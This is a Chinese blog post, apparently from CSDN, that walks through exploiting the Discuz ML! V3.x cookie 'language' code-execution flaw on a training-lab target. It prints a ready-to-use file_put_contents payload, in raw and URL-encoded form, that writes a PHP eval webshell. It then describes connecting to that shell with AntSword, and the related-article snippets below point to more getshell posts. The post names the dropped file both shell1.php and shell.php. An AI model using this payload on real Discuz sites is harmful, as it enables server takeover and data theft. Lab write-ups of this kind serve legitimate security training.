Discuz ML! V3.X代码执行漏洞

最新推荐文章于 2022-10-07 21:35:45 发布
最新推荐文章于 2022-10-07 21:35:45 发布
阅读量1.2k 收藏 5
点赞数
文章标签: 安全 php web linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45949219/article/details/104344854
版权

Discuz ML! V3.X代码执行漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限

【安鸾渗透实战平台】

靶场:http://whalwl.site:8042/forum.php
在这里插入图片描述

首先先用burp抓包,将抓到的数据包发送到Repeater,构造请求参数

在这里插入图片描述

在cookies里我们可以看到“CKxv_2132_language=sc”这个参数,即为漏洞点。我们将数据包发送到repeater,进行修改拼接利用burp抓包,

将tSWa_2132_language=sc 后面填上Phpinfo就会显示所有phpinfo输出的响应

因为cookie字段中language没有对参数进行过滤直接拼接从而写入缓存文件之中,儿缓存文件随后被加载,从而造成代码执行

我们可以使用file_put_contents() 函数写入一句话木马’.file_put_contents(‘shell1.php’,urldecode(’<?php eval($_POST["moo"]);?>’)).'经过编码后为%27.file_put_contents%28%27shell1.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522moo%2522%255d%29%253b%253f%253e%27%29%29.%27

在这里插入图片描述

然后用浏览器访问http://whalwl.site:8042/shell.php

在这里插入图片描述
最后使用蚁剑连接

在这里插入图片描述

连接成功
在这里插入图片描述

在这里插入图片描述

信安学徒
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DiscuzML 3.x任意代码执行漏洞CNVD-2019-22239
千寻的博客
05-14 1240
文章目录0x01 简介0x02 漏洞概述0x03 影响版本0x04 漏洞编号0x05 漏洞分析0x06 环境搭建第一步 使用phpstudy搭建网站,第二步 解开源码压缩包,进行安装第三步 下一步第四步 运行环境选择全新安装第五步 填写数据库及管理员信息第六步 安装完成第七步 点击上方链接访问网站0x07 漏洞复现第一步 访问网站第二步 抓取数据包,进行数据包重放第三步 发包后出现phpinfo信息,证明漏洞存在。第四步 对漏洞进行利用,获取目标网站权限,第五步 管理工具进行连接0x08 漏洞修复免责声明
Discuz 7.x/6.x 全局变量防御绕过导致代码执行
haha1314的博客
07-15 971
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞漏洞复现 安装成功后,直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][sm...
Discuz! ML远程代码执行(CVE-2019-13956)
WY92139010的博客
08-24 435
Discuz! ML远程代码执行(CVE-2019-13956) 一、漏洞描述 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 二、漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三、漏洞环境搭建 1、 官网下载Discuz! ML V...
Discuz!ML 3.x任意代码执行漏洞
logan_logan的博客
07-29 1643
1.简介 影响系统及版本:Discuz!ML V3.2-3.4 漏洞原因:Discuz!ML系统对cookie中接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 2.环境搭建 网站环境:phpstudy_pro DisCuz版本:3.4 PHP版本:php5.4.45nts Apache版本:2.4.39 Mysql版本:5.7.26 3.Discuz安装 将源码复制到网站根目录下; 在网页输入地址打开安装界面,然后一直下一步就ok了; 4.漏洞复现 用火狐浏览器打开,
Discuz ML! V3.X 代码注入漏洞深度分析
systemino的博客
07-14 577
作者:Alpha 天融信阿尔法实验室 0x00 前言 DiscuzML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像“社交网络”这样的互联网社区。 该引擎基于Comsenz Inc.创建的着名的Discuz!X引擎开发。 0x01 漏洞描述 2019年7月11日, DiscuzML被发现存在一处远程代码执行漏洞,攻击者通过在请...
Tools_Discuz!X1.X_20101124_1.5.5M
12-05
X1.X_20101124_1.5.5M"工具包是Discuz!X1.X论坛管理员的得力助手,通过其丰富的功能,能够有效地应对论坛运营中的各种挑战,提升管理效率,保障论坛的稳定和安全。对于那些正在使用或计划使用Discuz!X1.X的用户来说...
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
发主题帖随机中奖插件 for Discuz! 7.x GBK.rar
07-14
1.修改newyear.php里面代码什么根据自己需要修改,代码很少很简单,主要是制定回复的帖子、网址及积分设置! 2.如果需要给回复也添加奖励,就修改newreply.inc.php,同newthread.inc.php一样,但一定将论坛快速回复...
论坛首页顶部快速登入插件 for discuz!7.0.rar
07-14
标题中的“论坛首页顶部快速登入插件 for discuz!7.0.rar”指的是适用于Discuz!7.0版本的一个插件,主要功能是为论坛用户提供更便捷的首页顶部登录功能。Discuz!是一款广泛使用的开源社区论坛软件,它允许站长构建...
Convert X 转贴工具插件 for Discuz!7.0.rar
07-14
"Convert X 转贴工具插件 for Discuz!7.0" 是一款专为Discuz! 7.0论坛系统设计的程序插件。Discuz!是一款非常流行的开源社区论坛软件,它允许用户建立自己的在线社区,进行讨论和互动。这款转贴工具插件的出现,...
Discuz Ml v3.x 前台Getshell姿势 Discuz漏洞
god_Zeo的安全博客
07-14 6217
Discuz Ml v3.x 前台Getshell姿势1.漏洞描述2.原理3.影响版本4.利用过程4.getshell POC请勿用于非法用途 1.漏洞描述 DiscuzML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像“社交网络”这样的互联网社区。 2019年7月11日, DiscuzML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的coo...
Discuz NT 多个版本文件上传漏洞
fengling132的专栏
05-09 1551
文章作者:rebeyond 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。 受影响版本:貌似都受影响。 漏洞文件:tools/ajax.aspx 漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客
Discuz! X 3.4 ML 任意代码执行漏洞复现
墙角睡大觉的专栏
07-13 3896
0X1 漏洞概述 2019年7月11日,网络上出现了一个DiscuzML远程代码执行漏洞的PoC,研究员验证分析发现,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4、Discuz! ML v.3.3、Discuz...
安鸾渗透实战平台(CMS系列)—— Discuz (150分)
weixin_50985113的博客
04-29 1980
漏洞环境 安鸾渗透实战平台 火狐代理插件(foxyproxy) burp suitepro(抓包工具) 中国蚁剑(webshell管理工具) 题目 情况分析 1、访问网页,右下角有CMS版本名称和版本号 2、使用搜索引擎去查看历史漏洞 3、挑选一个进行测试 用一个远程代码执行的: 1.Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2.产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从
在lnmp服务器用file_put_contents函数写入文件无法写入的解决方法
fjnjxr的博客|PHP每周一贴
10-09 5347
在lnmp服务器用file_put_contents函数写入文件总是无法成功,仔细查阅资料,发现问题出现在拥有者(属主)是root的问题,更改拥有者(属主)为nginx完美解决问题。
file_put_contents()理解
lmp5023的博客
03-30 2512
file_put_contents()会把路径里的文件内容覆盖掉 该函数访问文件时,遵循以下规则: 如果设置了 FILE_USE_INCLUDE_PATH,那么将检查 *filename* 副本的内置路径 如果文件不存在,将创建一个文件 打开文件 如果设置了 LOCK_EX,那么将锁定文件 如果设置了 FILE_APPEND,那么将移至文件末尾。否则,将会清除文件的内容 向文件中...
Discuz远程代码执行(CVE-2019-13956)
snowlyzz的博客
10-07 954
discuz_漏洞复现
Discuz x3.1 utility/convert/config.inc.php漏洞get shell
灰蜗牛
09-26 7687
Discuz x3.1 utility/convert/config.inc.php漏洞get shell i 春秋 --- 竞赛训练 -- 这不是DZ?
discuz程序php木马,discuzML 3.x代码执行漏洞的利用
weixin_39655993的博客
03-22 233
一、漏洞原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。二、环境搭建Centos7 PHP5.6漏洞源码:链接:https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw提取码:5ka0http://discuz.ml/download三、复现利用环境搭建好了,我们访问下网站网站没有问题...
discuz3.4!ml.zip
最新发布
04-28
discuz3.4!ml.zip 是一个与论坛程序 Discuz! 相关的软件包,其中包含多语言支持的文件。Discuz! 是一个开源的 PHP 论坛程序,它允许网站管理员创建和管理论坛,让用户能够在线交流和讨论。该软件包使得 Discuz! 能够支持多种语言,使其在国际化环境下更易于使用。 Discuz! 由北京康盛新创科技有限公司开发,目前已经成为国内知名的论坛程序之一。它提供了丰富的功能和插件,使得管理员可以自定义论坛的外观和功能。同时,它也提供了严格的用户权限管理,保证了论坛的安全性。 discuz3.4!ml.zip 文件的存在,使得 Discuz! 能够支持多语言功能。安装该软件包后,管理员可以选择论坛的语言,在不同的语言环境下使用 Discuz! 让用户更容易地进行讨论和交流。除了支持多语言外,Discuz! 还有大量的插件和模板可用,让管理员可以根据需要进行自定义,打造出符合自己需求的论坛。 综上所述,discuz3.4!ml.zip 是一款非常有用的软件包,为 Discuz! 带来了多语言支持功能,让其在国际化环境下更加适用。Discuz! 作为一款稳定可靠的论坛程序,得到了广泛的应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值